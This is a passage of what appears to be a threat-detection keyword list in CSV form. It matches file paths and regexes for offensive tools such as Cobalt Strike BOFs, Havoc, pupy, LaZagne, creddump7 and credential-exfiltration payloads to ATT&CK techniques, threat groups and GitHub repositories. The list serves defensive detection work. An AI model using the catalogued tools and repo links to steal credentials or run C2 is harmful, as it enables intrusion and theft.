"*/CppWSManWinRM.exe*",".{0,1000}\/CppWSManWinRM\.exe.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","1","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","6211"
"*/crack.sh/get-cracking/*",".{0,1000}\/\/crack\.sh\/get\-cracking\/.{0,1000}","offensive_tool_keyword","crack.sh","crack.sh THE WORLD???S FASTEST DES CRACKER. Used by attackers to submit passwords to crack","T1110.002 - T1021.002","TA0006 - TA0008","N/A","N/A","Credential Access","https://crack.sh/get-cracking/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6212"
"*/crack_list/client_wordlists.py*",".{0,1000}\/crack_list\/client_wordlists\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6213"
"*/crack_list/cracklist_api.py*",".{0,1000}\/crack_list\/cracklist_api\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6214"
"*/crack_list/dictionary.py*",".{0,1000}\/crack_list\/dictionary\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6215"
"*/crack_list/wordlist.py*",".{0,1000}\/crack_list\/wordlist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6216"
"*/Cracked5pider/*",".{0,1000}\/Cracked5pider\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","6217"
"*/Cracked5pider/*",".{0,1000}\/Cracked5pider\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","6218"
"*/cracked-users.txt*",".{0,1000}\/cracked\-users\.txt.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","6219"
"*/cracklord.git*",".{0,1000}\/cracklord\.git.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","N/A","10","4","388","70","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z","6220"
"*/cracklord/cmd/*",".{0,1000}\/cracklord\/cmd\/.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","N/A","10","4","388","70","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z","6221"
"*/CrackMapExec.git",".{0,1000}\/CrackMapExec\.git","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","6222"
"*/crackmapexec/cme.conf*",".{0,1000}\/crackmapexec\/cme\.conf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","6223"
"*/cradle.ps1*",".{0,1000}\/cradle\.ps1.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","10","1","N/A","N/A","N/A","N/A","6224"
"*/cradle.ps1*",".{0,1000}\/cradle\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","6225"
"*/Crassus.git*",".{0,1000}\/Crassus\.git.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","6226"
"*/Crassus-main*",".{0,1000}\/Crassus\-main.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","6227"
"*/crawler.py -u http*",".{0,1000}\/crawler\.py\s\-u\shttp.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","0","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","6228"
"*/create_webshell_with_py.py*",".{0,1000}\/create_webshell_with_py\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6230"
"*/createforestcache.py*",".{0,1000}\/createforestcache\.py.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","6231"
"*/Create-HotKeyLNK.ps1*",".{0,1000}\/Create\-HotKeyLNK\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","6232"
"*/createproxydll.sh*",".{0,1000}\/createproxydll\.sh.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","6233"
"*/createstager.py*",".{0,1000}\/createstager\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","6234"
"*/cred_dump.rc*",".{0,1000}\/cred_dump\.rc.{0,1000}","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Screetsec/TheFatRat","1","0","#linux","N/A","N/A","10","9941","2324","2024-03-17T12:09:38Z","2016-07-24T10:30:19Z","6235"
"*/Cred_Dump.sh*",".{0,1000}\/Cred_Dump\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","6236"
"*/credBandit/*",".{0,1000}\/credBandit\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/CredBandit","1","1","N/A","N/A","10","10","240","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z","6237"
"*/creddump.py*",".{0,1000}\/creddump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","6238"
"*/creddump7*.py*",".{0,1000}\/creddump7.{0,1000}\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","6239"
"*/creddump7.git*",".{0,1000}\/creddump7\.git.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","6240"
"*/creddump7.git*",".{0,1000}\/creddump7\.git.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","6241"
"*/creddump7/*",".{0,1000}\/creddump7\/.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","6242"
"*/creddump7/*",".{0,1000}\/creddump7\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","6243"
"*/creddump7/releases/*",".{0,1000}\/creddump7\/releases\/.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","6244"
"*/credential access.cna*",".{0,1000}\/credential\saccess\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6245"
"*/Credentials/*.ccache*",".{0,1000}\/Credentials\/.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6246"
"*/credentials/enum_cred_store*",".{0,1000}\/credentials\/enum_cred_store.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","#linux","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","6247"
"*/credentials/enum_laps*",".{0,1000}\/credentials\/enum_laps.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","#linux","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","6248"
"*/Credentials/firefox_*.txt*",".{0,1000}\/Credentials\/firefox_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6249"
"*/Credentials/msol_*.txt*",".{0,1000}\/Credentials\/msol_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6250"
"*/credentials/SudoSnatch*",".{0,1000}\/credentials\/SudoSnatch.{0,1000}","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","1","#linux","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","6251"
"*/credentials/wifigrabber*",".{0,1000}\/credentials\/wifigrabber.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","6252"
"*/CredEnum.c*",".{0,1000}\/CredEnum\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","6253"
"*/CredEnum.cna*",".{0,1000}\/CredEnum\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","6254"
"*/CredEnum.h*",".{0,1000}\/CredEnum\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","6255"
